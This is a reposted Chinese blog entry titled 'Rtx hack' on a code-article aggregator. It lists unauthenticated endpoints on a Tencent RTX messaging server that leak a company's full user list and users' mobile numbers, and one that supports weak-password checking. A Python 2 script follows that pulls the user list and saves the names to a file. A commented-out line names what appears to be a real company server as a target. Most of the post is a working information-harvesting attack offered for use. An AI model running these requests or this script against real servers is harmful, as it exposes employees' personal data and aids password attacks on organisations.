码迷,mamicode.com
首页 > 其他好文 > 详细

Rtx hack

时间:2015-05-05 12:47:38      阅读:156      评论:0      收藏:0      [点我收藏+]

标签:用户   信息   手机号   

http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户

http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号

http://RtxServerIp:8012/check.php #验证弱口令


此脚本只是用于抓取用户信息

#-*-coding=utf-8-*-
# date : 2015年5月5日
# author : sanr
# rtx hack
import requests
import sys
import json

if len(sys.argv) < 2:
 print ‘‘‘  
	rtx.py  http://x.com:8012/userlist.php
	‘‘‘
else:
	if sys.argv[1].startswith(‘htt‘): #判断传参是否以htt开头
		r = requests.get(sys.argv[1])
		js = json.loads(r.text)
		for each in js:
			print each[‘id‘],each[‘name‘].encode(‘utf8‘)
			#line = ‘%s\r\n‘ %(each[‘name‘].encode(‘utf8‘)) 跟下面一条一句同等
			line = each[‘name‘].encode(‘utf8‘)+‘\r\n‘
			f=open(‘rtx hack.txt‘,‘a‘)
			f.write(line) 
			f.close()
	else:
		print ‘‘‘ 
		Please add http://
			‘‘‘
#name(str=‘http://tgzdh.tangsteel.com:92/userlist.php‘)
#name(raw_input(‘请输入网址:‘))


本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1641958

Rtx hack

标签:用户   信息   手机号   

原文地址:http://0x007.blog.51cto.com/6330498/1641958

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!